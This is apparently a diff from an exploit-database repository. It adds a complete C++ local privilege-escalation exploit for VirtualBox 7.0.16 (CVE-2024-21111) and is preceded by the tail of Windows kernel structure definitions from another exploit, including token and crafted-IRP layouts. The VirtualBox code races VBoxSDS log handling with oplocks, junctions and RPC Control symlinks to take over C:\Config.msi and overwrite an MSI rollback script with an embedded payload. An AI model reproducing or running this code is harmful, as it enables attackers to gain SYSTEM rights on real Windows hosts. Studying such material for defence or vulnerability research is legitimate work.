SYSTEM_MODULE_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
{
PVOID Object;
ULONG_PTR UniqueProcessId;
ULONG_PTR HandleValue;
ULONG GrantedAccess;
USHORT CreatorBackTraceIndex;
USHORT ObjectTypeIndex;
ULONG HandleAttributes;
ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
typedef struct _SYSTEM_HANDLE_INFORMATION_EX
{
ULONG_PTR NumberOfHandles;
ULONG_PTR Reserved;
SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
typedef struct _AFD_CREATE_PACKET {
//FILE_FULL_EA_INFORMATION
ULONG NextEntryOffset;
WORD Flags;
UCHAR EaNameLength;
USHORT EaValueLength;
CHAR EaName[15];
//AFD_CREATE_PACKET
ULONG EndpointFlags;
ULONG GroupID;
ULONG AddressFamily;
ULONG SocketType;
ULONG Protocol;
ULONG SizeOfTransportName;
wchar_t TransportName[16];
//UCHAR Unkown;
} AFD_CREATE_PACKET;
enum THREADINFOCLASS { ThreadImpersonationToken = 5 };
enum SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemExtendedHandleInformation = 64
};
typedef enum EVENT_TYPE {
NotificationEvent,
SynchronizationEvent
};
typedef struct _AFD_BIND_DATA {
ULONG ShareType;
SOCKADDR_IN addr;
} AFD_BIND_DATA, * PAFD_BIND_DATA;
typedef struct alignas(16) MY_AFD_CONNECT_INFO
{
__int64 UseSan;
__int64 hNtSock1;
__int64 Unknown;
__int32 tmp6;
WORD const_16;
sockaddr_in bind;
};
typedef struct FAKE_DATA_ENTRY_QUEUE
{
DWORD tmp;
LIST_ENTRY nextQueue;
__int64 unknown;
PVOID security_client_context;
__int64 unknown2;
__int64 sizeOfData;
char DATA[0x77FD0];
};
typedef struct _AFD_LISTEN_INFO {
ULONG unknown;
__int64 MaximumConnectionQueue;
} AFD_LISTEN_INFO, * PAFD_LISTEN_INFO;
typedef struct _SECURITY_CLIENT_CONTEXT
{
_SECURITY_QUALITY_OF_SERVICE SecurityQos;
void* ClientToken;
unsigned __int8 DirectlyAccessClientToken;
unsigned __int8 DirectAccessEffectiveOnly;
unsigned __int8 ServerIsRemote;
_TOKEN_CONTROL ClientTokenControl;
}SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT;
struct __declspec(align(8)) _OWNER_ENTRY
{
unsigned __int64 OwnerThread;
DWORD ___u1;
};
//0x68 bytes (sizeof)
typedef struct _ERESOURCE
{
struct _LIST_ENTRY SystemResourcesList; //0x0
struct _OWNER_ENTRY* OwnerTable; //0x10
SHORT ActiveCount; //0x18
union
{
USHORT Flag; //0x1a
struct
{
UCHAR ReservedLowFlags; //0x1a
UCHAR WaiterPriority; //0x1b
};
};
VOID* SharedWaiters; //0x20
VOID* ExclusiveWaiters; //0x28
struct _OWNER_ENTRY OwnerEntry; //0x30
ULONG ActiveEntries; //0x40
ULONG ContentionCount; //0x44
ULONG NumberOfSharedWaiters; //0x48
ULONG NumberOfExclusiveWaiters; //0x4c
VOID* Reserved2; //0x50
union
{
VOID* Address; //0x58
ULONGLONG CreatorBackTraceIndex; //0x58
};
ULONGLONG SpinLock; //0x60
}ERESOURCE, *PERESOURCE;
//0x8 bytes (sizeof)
typedef struct _EX_PUSH_LOCK
{
union
{
struct
{
ULONGLONG Locked : 1; //0x0
ULONGLONG Waiting : 1; //0x0
ULONGLONG Waking : 1; //0x0
ULONGLONG MultipleShared : 1; //0x0
ULONGLONG Shared : 60; //0x0
};
ULONGLONG Value; //0x0
VOID* Ptr; //0x0
};
};
//0x10 bytes (sizeof)
typedef struct _SEP_CACHED_HANDLES_TABLE
{
struct _EX_PUSH_LOCK Lock; //0x0
struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8
};
//0x8 bytes (sizeof)
typedef struct _EX_RUNDOWN_REF
{
union
{
ULONGLONG Count; //0x0
VOID* Ptr; //0x0
};
};
//0x20 bytes (sizeof)
typedef struct _OB_HANDLE_REVOCATION_BLOCK
{
struct _LIST_ENTRY RevocationInfos; //0x0
struct _EX_PUSH_LOCK Lock; //0x10
struct _EX_RUNDOWN_REF Rundown; //0x18
};
//0xc0 bytes (sizeof)
typedef struct _SEP_LOGON_SESSION_REFERENCES
{
struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0
struct _LUID LogonId; //0x8
struct _LUID BuddyLogonId; //0x10
LONGLONG ReferenceCount; //0x18
ULONG Flags; //0x20
struct _DEVICE_MAP* pDeviceMap; //0x28
VOID* Token; //0x30
struct _UNICODE_STRING AccountName; //0x38
struct _UNICODE_STRING AuthorityName; //0x48
struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58
struct _EX_PUSH_LOCK SharedDataLock; //0x68
struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes;
//0x70
struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78
struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80
struct _EJOB* ServerSilo; //0xa0
struct _LUID SiblingAuthId; //0xa8
struct _LIST_ENTRY TokenList; //0xb0
};
//0x30 bytes (sizeof)
typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
{
ULONG SecurityAttributeCount; //0x0
struct _LIST_ENTRY SecurityAttributesList; //0x8
ULONG WorkingSecurityAttributeCount; //0x18
struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20
}AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION;
//0x20 bytes (sizeof)
typedef struct _SEP_SID_VALUES_BLOCK
{
ULONG BlockLength; //0x0
LONGLONG ReferenceCount; //0x8
ULONG SidCount; //0x10
ULONGLONG SidValuesStart; //0x18
}SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK;
//0x18 bytes (sizeof)
struct _SEP_TOKEN_PRIVILEGES
{
ULONGLONG Present; //0x0
ULONGLONG Enabled; //0x8
ULONGLONG EnabledByDefault; //0x10
};
//0x1f bytes (sizeof)
struct _SEP_AUDIT_POLICY
{
struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0
UCHAR PolicySetStatus; //0x1e
};
//0x498 bytes (sizeof)
struct _TOKEN
{
struct _TOKEN_SOURCE TokenSource; //0x0
struct _LUID TokenId; //0x10
struct _LUID AuthenticationId; //0x18
struct _LUID ParentTokenId; //0x20
union _LARGE_INTEGER ExpirationTime; //0x28
struct _ERESOURCE* TokenLock; //0x30
struct _LUID ModifiedId; //0x38
struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40
struct _SEP_AUDIT_POLICY AuditPolicy; //0x58
ULONG SessionId; //0x78
ULONG UserAndGroupCount; //0x7c
ULONG RestrictedSidCount; //0x80
ULONG VariableLength; //0x84
ULONG DynamicCharged; //0x88
ULONG DynamicAvailable; //0x8c
ULONG DefaultOwnerIndex; //0x90
struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98
struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0
VOID* PrimaryGroup; //0xa8
ULONG* DynamicPart; //0xb0
struct _ACL* DefaultDacl; //0xb8
enum _TOKEN_TYPE TokenType; //0xc0
enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4
ULONG TokenFlags; //0xc8
UCHAR TokenInUse; //0xcc
ULONG IntegrityLevelIndex; //0xd0
ULONG MandatoryPolicy; //0xd4
void* LogonSession; //0xd8
struct _LUID OriginatingLogonSession; //0xe0
struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8
struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8
struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION*
pSecurityAttributes; //0x308
VOID* Package; //0x310
struct _SID_AND_ATTRIBUTES* Capabilities; //0x318
ULONG CapabilityCount; //0x320
struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328
struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438
struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440
struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes;
//0x448
VOID* TrustLevelSid; //0x450
struct _TOKEN* TrustLinkedToken; //0x458
VOID* IntegrityLevelSidValue; //0x460
struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468
struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470
struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478
struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480
VOID* SessionObject; //0x488
ULONGLONG VariablePart; //0x490
};
//0x38 bytes (sizeof)
struct _OBJECT_HEADER
{
LONGLONG PointerCount; //0x0
union
{
LONGLONG HandleCount; //0x8
VOID* NextToFree; //0x8
};
struct _EX_PUSH_LOCK Lock; //0x10
UCHAR TypeIndex; //0x18
union
{
UCHAR TraceFlags; //0x19
struct
{
UCHAR DbgRefTrace : 1; //0x19
UCHAR DbgTracePermanent : 1; //0x19
};
};
UCHAR InfoMask; //0x1a
union
{
UCHAR Flags; //0x1b
struct
{
UCHAR NewObject : 1; //0x1b
UCHAR KernelObject : 1; //0x1b
UCHAR KernelOnlyAccess : 1; //0x1b
UCHAR ExclusiveObject : 1; //0x1b
UCHAR PermanentObject : 1; //0x1b
UCHAR DefaultSecurityQuota : 1; //0x1b
UCHAR SingleHandleEntry : 1; //0x1b
UCHAR DeletedInline : 1; //0x1b
};
};
ULONG Reserved; //0x1c
union
{
struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20
VOID* QuotaBlockCharged; //0x20
};
VOID* SecurityDescriptor; //0x28
struct _TOKEN Body; //0x30
};
struct mm {
void* fake_data_entry;
void* input;
_IRP* crafted_irp;
IO_STACK_LOCATION *crafted_arbitrary_io_stack_location;
void* p_mem_0x30;
void* p_mem_0xD0_2;
_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes;
ACL* VariablePartDefaultDacl;
ACL* VariablePartDefaultDacl2;
_ERESOURCE* TokenLock;
void* PrimaryGroup;
int sizeOfClientTokenAndObjectHeader;
PSEP_SID_VALUES_BLOCK TokenSidValues;
_SECURITY_CLIENT_CONTEXT* security_client_context;
_SEP_LOGON_SESSION_REFERENCES* LogonSession;
_TOKEN* fakeToken;
void *pipe_100_im_control_block;
void* pipe_100_rw_control_block;
void* p_mem_Pipe_hToPipe_1000_rw;
void* p_mem_Pipe_hToPipe_1000_rw_2;
HANDLE hPipeIM;
HANDLE hPipeRW;
HANDLE hFileIM;
HANDLE hFileRW;
HANDLE IncPrimitiveTOKEN;
HANDLE RWPrimitiveTOKEN;
};
//0x18 bytes (sizeof)
struct _DISPATCHER_HEADER
{
union
{
volatile LONG Lock; //0x0
LONG LockNV; //0x0
struct
{
UCHAR Type; //0x0
UCHAR Signalling; //0x1
UCHAR Size; //0x2
UCHAR Reserved1; //0x3
};
struct
{
UCHAR TimerType; //0x0
union
{
UCHAR TimerControlFlags; //0x1
struct
{
UCHAR Absolute : 1;

499
exploits/windows/local/52287.C++ Normal file
View file

@ -0,0 +1,499 @@
# Exploit Title: VirtualBox 7.0.16 - Privilege Escalation
# Date: 2025-05-06
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win x64
# CVE : CVE-2024-21111
#include <Windows.h>
#include <Shlwapi.h>
#include <WtsApi32.h>
#include <Msi.h>
#include <PathCch.h>
#include <AclAPI.h>
#include <iostream>
#include "resource.h"
#include "def.h"
#include "FileOplock.h"
#pragma comment(lib, "Msi.lib")
#pragma comment(lib, "Shlwapi.lib")
#pragma comment(lib, "wtsapi32")
#pragma comment(lib, "PathCch.lib")
#pragma comment(lib, "rpcrt4.lib")
#pragma warning(disable:4996)
struct __declspec(uuid("74AB5FFE-8726-4435-AA7E-876D705BCBA5"))
CLSID_VBoxSDS;
FileOpLock* oplock;
HANDLE hFile, vb11, h;
HANDLE hthread;
NTSTATUS retcode;
HMODULE hm = GetModuleHandle(NULL);
HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_RBS1), L"rbs");
DWORD RbsSize = SizeofResource(hm, res);
void* RbsBuff = LoadResource(hm, res);
WCHAR dir[MAX_PATH] = { 0x0 };
wchar_t filen[MAX_PATH] = { 0x0 };
DWORD WINAPI install(void*);
BOOL Move(HANDLE hFile);
void callback();
HANDLE getDirectoryHandle(LPWSTR file, DWORD access, DWORD share, DWORD
dispostion);
LPWSTR BuildPath(LPCWSTR path);
void loadapis();
VOID cb1();
VOID cb0();
BOOL Monitor(HANDLE hDir);
BOOL clearDataDir();
BOOL CreateJunction(LPCWSTR dir, LPCWSTR target) {
HANDLE hJunction;
DWORD cb;
wchar_t printname[] = L"";
HANDLE hDir;
hDir = CreateFile(dir, FILE_WRITE_ATTRIBUTES, FILE_SHARE_READ, NULL,
OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (hDir == INVALID_HANDLE_VALUE) {
printf("[!] Failed to obtain handle on directory %ls.\n", dir);
return FALSE;
}
SIZE_T TargetLen = wcslen(target) * sizeof(WCHAR);
SIZE_T PrintnameLen = wcslen(printname) * sizeof(WCHAR);
SIZE_T PathLen = TargetLen + PrintnameLen + 12;
SIZE_T Totalsize = PathLen + (DWORD)(FIELD_OFFSET(REPARSE_DATA_BUFFER,
GenericReparseBuffer.DataBuffer));
PREPARSE_DATA_BUFFER Data = (PREPARSE_DATA_BUFFER)malloc(Totalsize);
Data->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
Data->ReparseDataLength = PathLen;
Data->Reserved = 0;
Data->MountPointReparseBuffer.SubstituteNameOffset = 0;
Data->MountPointReparseBuffer.SubstituteNameLength = TargetLen;
memcpy(Data->MountPointReparseBuffer.PathBuffer, target, TargetLen + 2);
Data->MountPointReparseBuffer.PrintNameOffset = (USHORT)(TargetLen + 2);
Data->MountPointReparseBuffer.PrintNameLength = (USHORT)PrintnameLen;
memcpy(Data->MountPointReparseBuffer.PathBuffer + wcslen(target) + 1,
printname, PrintnameLen + 2);
if (DeviceIoControl(hDir, FSCTL_SET_REPARSE_POINT, Data, Totalsize, NULL,
0, &cb, NULL) != 0)
{
printf("[+] Junction %ls -> %ls created!\n", dir, target);
free(Data);
return TRUE;
}
else
{
printf("[!] Error: %d. Exiting\n", GetLastError());
free(Data);
return FALSE;
}
}
BOOL DeleteJunction(LPCWSTR path) {
REPARSE_GUID_DATA_BUFFER buffer = { 0 };
BOOL ret;
buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
DWORD cb = 0;
IO_STATUS_BLOCK io;
HANDLE hDir;
hDir = CreateFile(path, FILE_WRITE_ATTRIBUTES, FILE_SHARE_READ, NULL,
OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS | FILE_OPEN_REPARSE_POINT, NULL);
if (hDir == INVALID_HANDLE_VALUE) {
printf("[!] Failed to obtain handle on directory %ls.\n", path);
printf("%d\n", GetLastError());
return FALSE;
}
ret = DeviceIoControl(hDir, FSCTL_DELETE_REPARSE_POINT, &buffer,
REPARSE_GUID_DATA_BUFFER_HEADER_SIZE, NULL, NULL, &cb, NULL);
if (ret == 0) {
printf("Error: %d\n", GetLastError());
return FALSE;
}
else
{
printf("[+] Junction %ls delete!\n", dir);
return TRUE;
}
}
BOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH, object,
target)) {
printf("[+] Symlink %ls -> %ls created!\n", object, target);
return TRUE;
}
else
{
printf("error :%d\n", GetLastError());
return FALSE;
}
}
BOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH |
DDD_REMOVE_DEFINITION | DDD_EXACT_MATCH_ON_REMOVE, object, target)) {
printf("[+] Symlink %ls -> %ls deleted!\n", object, target);
return TRUE;
}
else
{
printf("error :%d\n", GetLastError());
return FALSE;
}
}
void runSDS(int delay) {
if (delay == 1) {
printf("[!] sleeping for 2 sec\n");
Sleep(2000);
}
CoInitialize(NULL);
LPVOID ppv;
// 1st trigger to create VBoxSDS.log dir
CoCreateInstance(__uuidof(CLSID_VBoxSDS), 0, CLSCTX_LOCAL_SERVER,
IID_IUnknown, &ppv);
CoUninitialize();
}
BOOL checkSDSLog() {
BOOL clear = FALSE;
std::wstring vboxDataDir = L"C:\\ProgramData\\VirtualBox\\VBoxSDS.log.*";
HANDLE hFind;
WIN32_FIND_DATA data;
hFind = FindFirstFile(LPCWSTR(vboxDataDir.c_str()), &data);
// iterate first VBoxSDS.log
FindNextFile(hFind, &data);
if (hFind != INVALID_HANDLE_VALUE) {
do {
if (wcswcs(data.cFileName, L"VBoxSDS.log.")) {
runSDS(0);
//wprintf(L"%s\n", data.cFileName);
}
else {
printf("[+] Logs have been cleared!\n");
clear = TRUE;
}
//wprintf(L"%s\n", data.cFileName);
} while (FindNextFile(hFind, &data));
FindClose(hFind);
}
//printf("CLEAR: %d\n", clear);
return clear;
}
BOOL enumProc(const wchar_t* procName) {
PWTS_PROCESS_INFO processes{};
BOOL ok = FALSE;
DWORD count;
if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, NULL, 1, &processes,
&count)) {
for (DWORD i = 0; i < count; i++) {
if (wcswcs(processes[i].pProcessName, procName)) {
wprintf(L"[!] Process active: %s with PID %d\n",
processes[i].pProcessName, processes[i].ProcessId);
ok = TRUE;
break;
}
}
}
else {
printf("err: %d\n", GetLastError());
}
WTSFreeMemory(processes);
return ok;
}
void checkIfExists() {
if (enumProc(L"VirtualBoxVM.exe")) {
printf("[!] You seem to have active VMs running, please stop them before
running this to prevent corruption of any saved data of the VMs.\n");
exit(1);
}
if (enumProc(L"VirtualBox.exe")) {
printf("[!] VirtualBox process active\n");
// message
printf("[!] Trying to exit virtualbox by postmessage close window\n");
PostMessage(FindWindow(NULL, TEXT("Oracle VM VirtualBox Manager")),
WM_CLOSE, NULL, NULL);
printf("[!] Letting VBoxSDS exit (wait 12 seconds)\n\n");
Sleep(12000);
if (enumProc(L"VBoxSDS.exe")) {
printf("[-] error stopping vboxsds\n");
exit(1);
}
else {
printf("[+] Success stopping vboxsds!\n");
}
}
}
BOOL clearDataDir() {
do {
vb11 = CreateFile(L"C:\\ProgramData\\VirtualBox\\VBoxSDS.log.11", DELETE,
FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_ALWAYS,
FILE_FLAG_OVERLAPPED, NULL);
printf("h: %x %d\n", vb11, GetLastError());
} while (vb11 == INVALID_HANDLE_VALUE);
oplock = FileOpLock::CreateLock(vb11, cb1);
if (oplock != NULL) {
HANDLE c = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)runSDS, NULL, 0,
NULL);
oplock->WaitForLock(INFINITE);
CloseHandle(c);
}
BOOL isEmpty = FALSE;
do {
isEmpty = checkSDSLog();
} while (isEmpty == FALSE);
if (!RemoveDirectory(L"C:\\ProgramData\\VirtualBox\\VBoxSDS.log")) {
printf("error removing vboxlog dir\n");
exit(1);
}
return isEmpty;
}
int wmain() {
loadapis();
checkIfExists();
clearDataDir();
hFile = getDirectoryHandle(BuildPath(L"C:\\Config.msi"), GENERIC_READ |
DELETE, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF);
if (hFile == INVALID_HANDLE_VALUE)
{
printf("[!] Failed to create C:\\Config.msi directory. Trying to delete
it.\n");
install(NULL);
hFile = getDirectoryHandle(BuildPath(L"C:\\Config.msi"), GENERIC_READ |
DELETE, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF);
if (hFile != INVALID_HANDLE_VALUE)
{
printf("[+] Successfully removed and recreated C:\\Config.Msi.\n");
}
else
{
printf("[!] Failed. Cannot remove c:\\Config.msi");
//return 1;
}
}
if (!PathIsDirectoryEmpty(L"C:\\Config.Msi"))
{
printf("[!] Failed. C:\\Config.Msi already exists and is not empty.\n");
//return 1;
}
printf("[+] Config.msi directory created!\n");
HANDLE hDir =
getDirectoryHandle(BuildPath(L"C:\\ProgramData\\VirtualBox"), GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF);
printf("hDir: %x\n", hDir);
//Monitor(hDir);
HANDLE zxc{};
zxc = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Monitor, hDir, 0,
NULL);
SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS);
SetThreadPriorityBoost(GetCurrentThread(), TRUE); // This lets us maintain
express control of our priority
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
oplock = FileOpLock::CreateLock(hFile, callback);
if (oplock != nullptr) {
oplock->WaitForLock(INFINITE);
delete oplock;
}
do {
hFile = getDirectoryHandle(BuildPath(L"C:\\Config.msi"), GENERIC_READ |
WRITE_DAC | READ_CONTROL | DELETE, FILE_SHARE_READ | FILE_SHARE_WRITE |
FILE_SHARE_DELETE, FILE_OPEN_IF);
} while (!hFile);
char buff[4096];
DWORD retbt = 0;
FILE_NOTIFY_INFORMATION* fn;
WCHAR* extension;
WCHAR* extension2;
do {
ReadDirectoryChangesW(hFile, buff, sizeof(buff) - sizeof(WCHAR), TRUE,
FILE_NOTIFY_CHANGE_FILE_NAME,
&retbt, NULL, NULL);
fn = (FILE_NOTIFY_INFORMATION*)buff;
size_t sz = fn->FileNameLength / sizeof(WCHAR);
fn->FileName[sz] = '\0';
extension = fn->FileName;
PathCchFindExtension(extension, MAX_PATH, &extension2);
} while (wcscmp(extension2, L".rbs") != 0);
SetSecurityInfo(hFile, SE_FILE_OBJECT,
UNPROTECTED_DACL_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION, NULL,
NULL, NULL, NULL);
while (!Move(hFile)) {
}
HANDLE cfg_h = getDirectoryHandle(BuildPath(L"C:\\Config.msi"),
FILE_READ_DATA, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
FILE_CREATE);
WCHAR rbsfile[MAX_PATH];
_swprintf(rbsfile, L"C:\\Config.msi\\%s", fn->FileName);
HANDLE rbs = CreateFile(rbsfile, GENERIC_WRITE, FILE_SHARE_READ |
FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL, NULL);
if (WriteFile(rbs, RbsBuff, RbsSize, NULL, NULL)) {
printf("[+] Rollback script overwritten!\n");
}
else
{
printf("[!] Failed to overwrite rbs file!\n");
}
CloseHandle(rbs);
CloseHandle(cfg_h);
DeleteJunction(dir);
CloseHandle(zxc);
WCHAR asdfasdf[MAX_PATH];
_swprintf(asdfasdf, L"GLOBAL\\GLOBALROOT\\RPC Control\\%s", filen);
DelDosDeviceSymLink(asdfasdf, L"\\??\\C:\\Config.msi::$INDEX_ALLOCATION");
return 0;
}
DWORD WINAPI install(void*) {
HMODULE hm = GetModuleHandle(NULL);
HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_MSI1), L"msi");
wchar_t msipackage[MAX_PATH] = { 0x0 };
GetTempFileName(L"C:\\windows\\temp\\", L"MSI", 0, msipackage);
printf("[*] MSI file: %ls\n", msipackage);
DWORD MsiSize = SizeofResource(hm, res);
void* MsiBuff = LoadResource(hm, res);
HANDLE pkg = CreateFile(msipackage, GENERIC_WRITE | WRITE_DAC,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL,
CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
WriteFile(pkg, MsiBuff, MsiSize, NULL, NULL);
CloseHandle(pkg);
MsiSetInternalUI(INSTALLUILEVEL_NONE, NULL);
UINT a = MsiInstallProduct(msipackage, L"ACTION=INSTALL");
printf("%d\n", a);
MsiInstallProduct(msipackage, L"REMOVE=ALL");
DeleteFile(msipackage);
return 0;
}
BOOL Move(HANDLE hFile) {
if (hFile == INVALID_HANDLE_VALUE) {
printf("[!] Invalid handle!\n");
return FALSE;
}
wchar_t tmpfile[MAX_PATH] = { 0x0 };
RPC_WSTR str_uuid;
UUID uuid = { 0 };
UuidCreate(&uuid);
UuidToString(&uuid, &str_uuid);
_swprintf(tmpfile, L"\\??\\C:\\windows\\temp\\%s", str_uuid);
size_t buffer_sz = sizeof(FILE_RENAME_INFO) + (wcslen(tmpfile) *
sizeof(wchar_t));
FILE_RENAME_INFO* rename_info =
(FILE_RENAME_INFO*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY |
HEAP_GENERATE_EXCEPTIONS, buffer_sz);
IO_STATUS_BLOCK io = { 0 };
rename_info->ReplaceIfExists = TRUE;
rename_info->RootDirectory = NULL;
rename_info->Flags = 0x00000001 | 0x00000002 | 0x00000040;
rename_info->FileNameLength = wcslen(tmpfile) * sizeof(wchar_t);
memcpy(&rename_info->FileName[0], tmpfile, wcslen(tmpfile) *
sizeof(wchar_t));
NTSTATUS status = pNtSetInformationFile(hFile, &io, rename_info,
buffer_sz, 65);
if (status != 0) {
return FALSE;
}
return TRUE;
}
void callback() {
SetThreadPriority(GetCurrentThread(), REALTIME_PRIORITY_CLASS);
Move(hFile);
hthread = CreateThread(NULL, NULL, install, NULL, NULL, NULL);
HANDLE hd;
do {
hd = getDirectoryHandle(BuildPath(L"C:\\Config.msi"), GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN);
} while (!hd);
do {
CloseHandle(hd);
hd = getDirectoryHandle(BuildPath(L"C:\\Config.msi"), GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN);
} while (hd);
CloseHandle(hd);
do {
hd = getDirectoryHandle(BuildPath(L"C:\\Config.msi"), GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN);
CloseHandle(hd);
} while (retcode != 0xC0000022);
}
HANDLE getDirectoryHandle(LPWSTR file, DWORD access, DWORD share, DWORD
dispostion) {
UNICODE_STRING ufile;
HANDLE hDir;
pRtlInitUnicodeString(&ufile, file);
OBJECT_ATTRIBUTES oa = { 0 };
IO_STATUS_BLOCK io = { 0 };
InitializeObjectAttributes(&oa, &ufile, OBJ_CASE_INSENSITIVE, NULL, NULL);
retcode = pNtCreateFile(&hDir, access, &oa, &io, NULL,
FILE_ATTRIBUTE_NORMAL, share, dispostion, FILE_DIRECTORY_FILE |
FILE_OPEN_REPARSE_POINT, NULL, NULL);
if (!NT_SUCCESS(retcode)) {
return NULL;
}
return hDir;
}
LPWSTR BuildPath(LPCWSTR path) {
wchar_t ntpath[MAX_PATH];
swprintf(ntpath, L"\\??\\%s", path);
return ntpath;
}
void loadapis() {
HMODULE ntdll = GetModuleHandle(L"ntdll.dll");
if (ntdll != NULL) {
pRtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(ntdll,
"RtlInitUnicodeString");
pNtCreateFile = (_NtCreateFile)GetProcAddress(ntdll, "NtCreateFile");
pNtSetInformationFile = (_NtSetInformationFile)GetProcAddress(ntdll,
"NtSetInformationFile");
}
if (pRtlInitUnicodeString == NULL || pNtCreateFile == NULL) {
printf("Cannot load api's %d\n", GetLastError());
exit(0);
}
}
void cb0() {
if (!Move(h)) {
printf("reached3\n");
exit(1);
}
printf("reached2\n");
_swprintf(dir, L"C:\\ProgramData\\VirtualBox");
if (!CreateJunction(BuildPath(dir), L"\\RPC Control")) {
printf("[!] Exiting!\n");
exit(1);
}
WCHAR asdfasdf[MAX_PATH];
_swprintf(asdfasdf, L"GLOBAL\\GLOBALROOT\\RPC Control\\%s", filen);
if (!DosDeviceSymLink(asdfasdf,
L"\\??\\C:\\Config.msi::$INDEX_ALLOCATION")) {
printf("zxc\n");
//printf("[!] Exiting!\n");
//exit(1);
}
}
void cb1() {
printf("[!] oplock triggered\n");
if (!Move(vb11)) {
printf("reached3\n");
exit(1);
}
if (!CreateDirectory(L"C:\\ProgramData\\VirtualBox\\VBoxSDS.log", NULL)) {
printf("Error creating dir. Exiting\n");
exit(1);
}
return;
}
BOOL Monitor(HANDLE hDir) {
printf("[!] Monitor called\n");
BOOL deleted = FALSE;
_swprintf(filen, L"VBoxSDS.log.11");
do {
do {
h = CreateFile(L"C:\\ProgramData\\VirtualBox\\VBoxSDS.log.11", DELETE,
FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_ALWAYS,
FILE_FLAG_OVERLAPPED, NULL);
printf("h: %x\n", h);
} while (h == INVALID_HANDLE_VALUE);
oplock = FileOpLock::CreateLock(h, cb0);
if (oplock != NULL) {
HANDLE c = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)runSDS,
(LPVOID)1, 0, NULL);
oplock->WaitForLock(INFINITE);
CloseHandle(c);
}
deleted = TRUE;
} while (deleted == FALSE);
return deleted;
}

5
files_exploits.csv
View file

@ -10684,6 +10684,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
